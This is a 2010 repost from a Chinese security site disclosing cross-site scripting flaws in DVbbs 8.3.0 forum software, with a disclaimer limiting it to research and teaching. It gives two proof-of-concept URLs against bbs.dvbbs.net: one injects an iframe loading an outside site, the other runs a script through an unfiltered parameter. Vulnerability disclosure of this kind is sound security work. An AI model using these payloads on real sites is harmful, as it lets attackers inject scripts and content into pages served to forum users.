欢迎来到 黑吧安全网 聚焦网络安全前沿资讯,精华内容,交流技术心得!

动网(DVbbs) Ver 8.3.0 多个跨站漏洞

来源:本站转载 作者:佚名 时间:2010-05-01 TAG: 我要投稿

动网论坛做为目前国内最大的社区论坛软件服务提供商,依靠其强大的功能、非凡的访问速度和负载能力、友好方便的客户操作界面、优质的客户服务、国内领先的 技术和强大而持续的产品研发并保持不断创新的能力,动网所提供的动网社区论坛产品已经占据了国内社区论坛产品使用比例的70%以上。

目标网站对用户提交的变量代码未进行有效的过滤或转换,允许攻击者插入恶意WEB代码。

测试代码1:

http://bbs.dvbbs.net/showerr.asp?BoardID=8&ErrCodes=60&action=%22%3E%3Ciframe%20src=%22http://www.51chi.net/qing%22+qing


测试代码2:

http://bbs.dvbbs.net/index.asp?boardid=8&TopicMode=0&List_Type=%27%22%29%3b%3E%3C%2fIfRaMe%3E%3CscRiPT%3Ealert%28%27www.51chi.net/qing%27%29%3C%2fScrIPT%3E



提供程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!


注:首发 猪哥亮 全球档案

【声明】:黑吧安全网(http://www.myhack58.com)登载此文出于传递更多信息之目的,并不代表本站赞同其观点和对其真实性负责,仅适于网络安全技术爱好者学习研究使用,学习中请遵循国家相关法律法规。如有问题请联系我们,联系邮箱admin@myhack58.com,我们会在最短的时间内进行处理。
  • 最新更新
    • 相关阅读
      • 本类热门
        • 最近下载